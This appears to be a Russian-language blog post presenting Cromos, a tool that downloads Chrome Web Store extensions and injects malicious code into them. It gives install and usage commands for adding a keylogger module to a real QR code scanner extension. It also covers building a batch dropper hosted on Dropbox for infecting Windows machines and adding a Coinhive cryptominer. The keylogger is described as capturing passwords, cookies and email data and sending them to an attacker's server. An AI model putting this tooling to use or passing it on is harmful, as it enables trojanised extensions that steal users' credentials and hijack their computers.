И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями. Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox. Функционал: · Загрузка расширения · Инъекция кода · Загрузка файлов в Dropbox · Заражение ОС семейства Windows Установка: > git clone https://github.com/fbctf/cromos > cd /cromos > pip install –r requirements.txt > python setup.py Справка: > ./cromos.py –h Использование: · Скачиваем подходящее расширение из маркета, предварительно узнав его ID. > python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb Я использовал QR code scanner. · Скачиваем нужное расширение и дополняем его установкой модуля keylogger. > python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется. Модифицированное расширение, можно найти здесь: Создание пакетного файла и загрузка его в Dropbox: > python cromos.py --extension {id} --build {bat} --token {dropboxToken} Модули: · modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent. · modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive. Небольшой ролик, по использованию инструмента от разработчиков: > https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1